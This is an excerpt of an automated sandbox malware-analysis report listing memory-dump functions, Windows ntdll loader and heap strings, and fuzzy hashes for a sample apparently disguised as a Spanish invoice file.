                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AF6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-3589223738
                                  • Opcode ID: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                  • Instruction ID: 92b6091c5148de257bb46dc8a110bc3fc4a3df3acae395308b842a9fbb217cb6
                                  • Opcode Fuzzy Hash: 8c48ac997cd39d5227fbe8778d6a9cc4b56629f90d16bed4d0cff23f7f40b4c9
                                  • Instruction Fuzzy Hash: 0E51F575B413589FDB08EFA8C854B9D77B2AB84304F440559F541FB296CBB09E81CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: @3]2$LdrpUnloadNode$Unmapping DLL "%wZ"$df]2@3]2@3]2$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-2199215269
                                  • Opcode ID: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                  • Instruction ID: f2a30507c33089e00bbf203638738998d33f3a16430b8d06d9f7585ffd15d125
                                  • Opcode Fuzzy Hash: ccfe33f67f13942fdc4c412ccd2e3244d637cd9fa139af4e82864f77ce2e5e59
                                  • Instruction Fuzzy Hash: 98512675605302AFE714DF38CC84B19BB90BFC4B24F448A6DE89597288DB70AB45CF95
                                  APIs
                                  Strings
                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3258F263
                                  • Entry Heap Size , xrefs: 3258F26D
                                  • ---------------------------------------, xrefs: 3258F279
                                  • HEAP: , xrefs: 3258F15D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                  • API String ID: 3446177414-1102453626
                                  • Opcode ID: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                  • Instruction ID: 507a0cd4657c6032799aed3923a980e458c40a67aa6089b1062eb11ada342c20
                                  • Opcode Fuzzy Hash: 3c9618128352ed0f4f2eb31feef9251e2cbf86acb719fb4a5b2da63644665b3c
                                  • Instruction Fuzzy Hash: 1441AE39B41216DFC704CF18C880A59BBF5EF4935575584AAE809EB311DBB1EE42CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                  • API String ID: 3446177414-1222099010
                                  • Opcode ID: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                  • Instruction ID: f200e637fe0b15a029315a7394ccc8750d9f24fd712a151154da10191ab07996
                                  • Opcode Fuzzy Hash: 1578f5873bd7599fdc943bbd9e3ec46e0bc7963fb63f8897bf6bebd16b3ac65c
                                  • Instruction Fuzzy Hash: 16312535106780DFF716CB28CD15F9ABBE4EF01750F008489E84697B52CFB8AA81CE21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: fd22b2a2a553bce52438e2449cf2cea6e0cee7aee3633b853911d3002104ffdc
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: EB0214B5509341AFDB04CF18C590A6FBBE5EFC8704F80892DF9984B2A4DB71EA45CB42
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: bc163107d90d8e9ee18d465e387ab9cda10cdb5de984a276ddaa0f26e2bd14d8
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 5281E4B8E053498EEF08CF68C8917EEBFB2AF45364F584659D861A72D1CB349B40CB51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$@
                                  • API String ID: 3446177414-1194432280
                                  • Opcode ID: 12da7916babb7c62109e1bf10582a580622b2bf8d3dccc8ca320961cc4274895
                                  • Instruction ID: fd56cd002e8a0fe9b14acf581c40e55f44b8ba2df3e16efefbcb6b3f360d7401
                                  • Opcode Fuzzy Hash: 12da7916babb7c62109e1bf10582a580622b2bf8d3dccc8ca320961cc4274895
                                  • Instruction Fuzzy Hash: 6A8129B5D002699BEB21CF54CC44BDEB7B4AB48754F4045EAE909F7280EB709E85CFA0
                                  APIs
                                  Strings
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3255362F
                                  • LdrpFindDllActivationContext, xrefs: 32553636, 32553662
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 3255365C
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 32553640, 3255366C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-3779518884
                                  • Opcode ID: ee150ec2682e801c25f1851d5e49ce9c4b008fc02d11bdedf0085a4222688856
                                  • Instruction ID: cfcc74cafb6ffaa16b12e78c9aa343fc58ec4232ecfd19d7b5df87a71769414d
                                  • Opcode Fuzzy Hash: ee150ec2682e801c25f1851d5e49ce9c4b008fc02d11bdedf0085a4222688856
                                  • Instruction Fuzzy Hash: DF314076900751BAFF11AF44C884B567BB4AB0179BF42646AE809A7150EF60BFC0C7D5
                                  Strings
                                  • TGK2, xrefs: 32502462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 3254A9A2
                                  • LdrpDynamicShimModule, xrefs: 3254A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3254A992
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGK2$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1393885241
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                  • String ID: T>l(
                                  • API String ID: 4281723722-210009607
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 3446177414-3610490719
                                  APIs
                                  Strings
                                  • LdrpCheckModule, xrefs: 3254A117
                                  • minkernel\ntdll\ldrinit.c, xrefs: 3254A121
                                  • Failed to allocated memory for shimmed module list, xrefs: 3254A10F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-161242083
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 325B8B03
                                  • RtlDebugPrintTimes.NTDLL ref: 325B8B5B
                                    • Part of subcall function 32522B60: LdrInitializeThunk.NTDLL ref: 32522B6A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$InitializeThunk
                                  • String ID: $File
                                  • API String ID: 1259822791-2412145507
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 325582E8
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 325582DE
                                  • Failed to reallocate the system dirs string !, xrefs: 325582D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1783798831
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32557B7F
                                  • RTL: Resource at %p, xrefs: 32557B8E
                                  • RTL: Re-Waiting, xrefs: 32557BAC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3255728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 325572A3
                                  • RTL: Re-Waiting, xrefs: 325572C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32557294
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32564899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32564888
                                  • LdrpCheckRedirection, xrefs: 3256488F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 3446177414-3154609507
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Wow64 Emulation Layer
                                  • API String ID: 3446177414-921169906
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0$Flst
                                  • API String ID: 0-758220159
                                  • Opcode ID: a1f6ccf817f26e886149204a002172a5c69676e68d6d4f18d95f5534b9f2ad85
                                  • Instruction ID: 83f0059087031033667b74e5afa875073bd51315b149a72f9380eaa7607b27fb
                                  • Opcode Fuzzy Hash: a1f6ccf817f26e886149204a002172a5c69676e68d6d4f18d95f5534b9f2ad85
                                  • Instruction Fuzzy Hash: C3519BB5E002489FEF15CF98D484759FBF4EF44799F65902ED4099B250EB70AA85CB80
                                  APIs
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 324E063D
                                  • kLsE, xrefs: 324E0540
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 3446177414-2547482624
                                  • Opcode ID: 16f3565602a39e59d180479155dbd8ad3e8111aacea566f3e6b2a315e2912470
